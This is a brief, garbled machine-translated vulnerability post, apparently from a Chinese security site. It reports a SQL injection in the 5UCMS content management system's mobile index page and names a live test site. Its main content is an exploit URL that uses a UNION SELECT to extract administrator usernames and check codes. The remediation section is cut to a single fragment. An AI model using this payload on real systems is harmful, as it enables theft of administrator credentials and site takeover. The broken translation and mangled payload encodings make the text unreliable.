5ucms the latest version sql injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201234116
Type myhack58
Reporter 佚名
Modified 2012-06-17T00:00:00


Vulnerability files:/mobile/index. asp

Vulnerability description: not the variable id filtered resultsql injection it!

Vulnerability test: http://www.5u.hk/ official

Vulnerability to prove↓

! QQ 截图 20120606183325.jpg

Vulnerability EXP↓

/mobile/index. asp? act=view&id=1%20union%20select%2 0 1,Username%26chr(1 2 4)%26CheckCode%20from%2 0{pre}admin

Bug fixes↓

Filtration and...

Let it go on for a long time, no how. It is put out. Hope only used for testing. Not for malicious use